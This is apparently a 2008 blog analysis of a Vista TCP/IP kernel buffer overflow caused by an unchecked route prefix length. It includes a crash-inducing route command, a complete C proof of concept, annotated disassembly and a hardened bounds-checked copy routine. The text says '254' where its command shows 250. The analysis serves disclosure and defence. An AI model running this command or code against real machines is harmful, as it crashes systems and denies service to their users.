CNet reported not long ago about a new vulnerability found in the kernel of Vista[1]. The attack is a buffer overflow which corrupts memory, and thus could be used for denial of service attacks. The report from Phion, the security company that reported the vulnerability, also states that the attack could be used to inject code[2].
The buffer overflow is caused by adding an IP address with an illegal subnet bits (prefix length) value to the IPv4 routing table. For example, the following command will make Vista crash with a blue screen of death:
C:\>route add 127.0.0.1/250 127.0.0.2
In the command above, we specified 254 as being the number of subnet bits, which is an illegal value. According to the vulnerability report by Thomas Unterleitner, the greater the value is, the quicker the crash is provoked[3].
The overflow is located in the CreateIpForwardEntry2 function, which is part of the IP Helper library (Iphlpapi.dll). The problem arises because the function doesn’t verify the value of the PrefixLength member of DestinationPrefix in the MIB_IPFORWARD_ROW2 structure passed to it. Therefore, the following code should crash the kernel[4]:
#define _WIN32_WINNT 0x0600      // target Vista, where CreateIpForwardEntry2 appeared
#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock2.h>
#include <ws2ipdef.h>
#include <iphlpapi.h>

#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "iphlpapi.lib")  // CreateIpForwardEntry2, InitializeIpForwardEntry
#pragma comment(lib, "ws2_32.lib")    // inet_addr

int main(int argc, char** argv)
{
    DWORD dwStatus;
    MIB_IPFORWARD_ROW2 route;

    if (argc != 3)
    {
        printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
        return -1;
    }

    // Zero the row and set the default field values
    InitializeIpForwardEntry(&route);

    route.InterfaceIndex = atoi(argv[1]);
    route.DestinationPrefix.Prefix.si_family = AF_INET;

    route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr
        = inet_addr("1.2.3.0");
    route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;

    // The unchecked value: anything above 32 is illegal for IPv4
    route.DestinationPrefix.PrefixLength = atoi(argv[2]);

    route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
    route.NextHop.Ipv4.sin_family = AF_INET;

    route.SitePrefixLength = 0;

    route.Protocol = MIB_IPPROTO_NETMGMT;
    route.Origin = NlroManual;
    route.ValidLifetime = 0xffffffff;
    route.PreferredLifetime = 0xffffffff;
    route.Metric = 1;

    // The kernel copies PrefixLength bits without bounding it first
    dwStatus = CreateIpForwardEntry2(&route);
    return dwStatus;
}
In order for this code to work you must be in the Administrators group or in the Network Operators group… so it’s of limited use for most people, but you never know…
The annotated disassembly below shows where the copy happens: NETIO!PtpCopyPartialKeys converts the unchecked PrefixLength from bits to bytes and hands that length straight to memcpy.

NETIO!PtpCopyPartialKeys:
    mov     edi,edi
    push    ebp
    mov     ebp,esp
    movzx   eax,word ptr [ebp+10h]    ; = 0x00ee PrefixLength in bits
    add     eax,7
    shr     eax,3
    push    eax                       ; 0x0000001e PrefixLength in bytes
    push    dword ptr [ebp+0Ch]       ; 0x934b7ac4 src buffer
    push    dword ptr [ebp+8]         ; 0x83716398 dst buffer
    ; 83716398 00 00 00 00 00 00 00 00-05 00 06 04 45 76 65 ee
    ; 837163a8 01 00 00 00 01 00 00 00-78 81 15 83 00 00 00 00
    ; 837163b8 18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
    ; ------------------------------------------------------------------
    call    NETIO!memcpy              ; memcpy(0x83716398, 0x934b7ac4, 0x0000001e) // BUFFER OVERFLOW!!!!
    ; ------------------------------------------------------------------
    ; 83716398 01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93
    ; 837163a8 78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 00 00
    ; 837163b8 18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
    ; compare the byte values with the src buffer printed before
    add     esp,0Ch
    pop     ebp
    ret     0Ch
    neg     ecx
    push    ecx
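As an added example (not code from the advisory or from Microsoft), the block below reproduces the (bits + 7) >> 3 arithmetic seen in PtpCopyPartialKeys and places it beside a copy routine that validates PrefixLength against the address family and the destination size before calling memcpy. The key sizes, function names and the masking of a partial last byte are assumptions for illustration; the real NETIO structure layout is not on the page.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed key sizes for this example: an IPv4 prefix needs at most 4 bytes,
 * an IPv6 prefix at most 16. The real NETIO buffer layout is not on the page. */
#define IPV4_KEY_BYTES 4
#define IPV6_KEY_BYTES 16

/* The arithmetic PtpCopyPartialKeys performs on the 16-bit PrefixLength:
 * 0xee bits -> 0x1e bytes, 250 bits -> 32 bytes. Nothing here bounds the result. */
static size_t prefix_bytes(uint16_t prefix_bits)
{
    return ((size_t)prefix_bits + 7) >> 3;
}

/* How many bytes an unchecked memcpy of prefix_bytes(bits) would write past a
 * destination of dst_len bytes (0 when it fits). */
static size_t unchecked_overrun(uint16_t prefix_bits, size_t dst_len)
{
    size_t n = prefix_bytes(prefix_bits);
    return n > dst_len ? n - dst_len : 0;
}

/* Hardened copy: reject before touching memory when PrefixLength exceeds what
 * the address family allows (32 for IPv4, 128 for IPv6) or what dst can hold.
 * Returns the number of bytes copied, or -1 when the row is rejected. */
static int copy_prefix_checked(uint8_t *dst, size_t dst_len,
                               const uint8_t *src, size_t src_len,
                               uint16_t prefix_bits, int is_ipv6)
{
    unsigned max_bits = is_ipv6 ? 128u : 32u;
    size_t n;

    if (prefix_bits > max_bits)
        return -1;
    n = prefix_bytes(prefix_bits);
    if (n > dst_len || n > src_len)
        return -1;
    memcpy(dst, src, n);
    /* Clear the host bits of a partial last byte so a /20 keeps only 20 bits. */
    if (n > 0 && (prefix_bits % 8) != 0)
        dst[n - 1] &= (uint8_t)(0xFFu << (8 - prefix_bits % 8));
    return (int)n;
}
```

With the page's values, prefix_bytes(0xee) yields 0x1e, and a 250-bit IPv4 prefix would write 28 bytes past a 4-byte key if the length were not rejected first.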
Microsoft said it had no intention of patching this buffer overflow before the next Vista service pack[5]. This exploit doesn’t apply to Windows XP.
[1] “Kernel vulnerability found in Vista”, David Meyer, CNet Security, November 22, 2008, http://news.cnet.com/8301-1009_3-10106173-83.html?part=rss&subj=news&tag=2547-1_3-0-20 (accessed on November 25, 2008)
[2] “Microsoft VISTA TCP/IP stack buffer overflow”, Thomas Unterleitner, November 19, 2008, http://www.securityfocus.com/archive/1/498471 (accessed on November 25, 2008)
[3] Ibid.
[4] Ibid. Code by Thomas Unterleitner
[5] “Vista kernel is vulnerable”, Egan Orion, The Inquirer, November 24, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/11/24/vista-kernel-vulnerable (accessed on November 25, 2008)